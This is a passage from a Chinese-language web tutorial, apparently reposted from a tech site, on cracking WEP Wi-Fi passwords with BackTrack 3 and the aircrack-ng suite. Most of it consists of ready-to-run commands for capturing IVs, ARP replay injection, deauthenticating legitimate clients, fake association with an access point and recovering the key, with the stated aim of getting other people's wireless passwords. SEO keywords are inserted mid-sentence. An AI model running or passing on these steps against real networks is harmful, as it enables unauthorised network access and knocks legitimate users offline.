bt3无线破解教程 【bt3破解教程】精典3分钟U盘BT3+Intel3945无线网卡破解无线密码简明教程 07(2)

（--ivs：仅截取ivs数据包，-w：写入文件，-c：截取ivs的信道）

（其中name是获取的ivs 的保存文件的名字，11 是channel值，你根据实际修改）

一. 有客户端WEP 破解

1．有客户端，且合法客户端产生大量有效的数据，能直接获得大量IVS。bt3无线破解教程

思路：1-6步同上

7．直接用aircrack-ng破解

第七步： aircrack-ng -n 64 -b <ap mac> name-01.ivs

2．有客户端，合法客户端只能产生少量ivs 数据，就需要注入攻击加速产生大量ivs。 只要有少量的数据就可能获得arp 请求包，则可用arp 注入模式的-3 模式通过不断向AP 发送

同样的arp请求包，来进行注入式攻击。

思路：1-6步同上

7．用aireplay-ng的arp注入方式获得大量的ivs

第七步：aireplay-ng -3 -b <ap mac> -h <合法客户端 mac> wifi0

注：这一步可能时间会长一点，因为需要等到ARP。

3．有客户端，但是客户端根本不在通信，不能产生ARP包。-3注入模式不成功 思路：1-6步同上

7．-0 冲突模式强制断开合法客户端和ap连接，使之重新连接

8．利用-0冲突模式重新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入

第七步：aireplay-ng -3 -b <ap mac> -h <合法客户端 mac> wifi0

第八步：aireplay-ng -0 10 –a <ap mac> -c <合法客户端 mac> wifi0

4．有客户端，并且客户端能产生有效arp 数据的另类破解方式

前面的步骤一样：

输入 modprobe –r iwl3945

输入 modprobe ipwraw

输入airmon-ng start wifi0 11

现在，只要一个命令就搞定，输入:

输入wesside-ng -i wifi0 -v 01:02:03:04:05:06 (此格式的AP MAC)。

很简单吧，密码出来了。

二．无客户端WEP破解

思路：1-6步同上

因为是无客户端，所以第一步就需要和AP之间建立一个虚拟连接。

这是非常关键的一步。bt3无线破解教程为让AP 接受数据包，必须使自己的网卡和AP 关联。如果没有关联的话，目标AP

将忽略所有从你网卡发送的数据包，IVS数据将不会产生。

第七步：输入 aireplay-ng -1 0 -e <ap essid> -a <ap mac> -h <mac> wifi0

如果回显虚拟伪装连接不成功，不能成功的原因很多，具体有如下几种：

1、目标AP做了MAC地址过滤

2、你离目标AP物理距离太远

3、对方使用了WPA加密

5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道

也可以使用命令tcpdump来确认网卡是否已经连接到目标AP上

tcpdump -n -e -s0 -vvv -i wifi0

1．第一种破解方式：

思路：1-7步同上

建立虚拟连接后直接用-2 交互攻击模式，这个模式集合了抓包和提取数据，发攻击包三种能力。

第八步：抓包，提数据和发包攻击

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0

发包成功后可得到足够的ivs，然后用aircrack-ng破解。

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/ruanjian/article-53606-2.html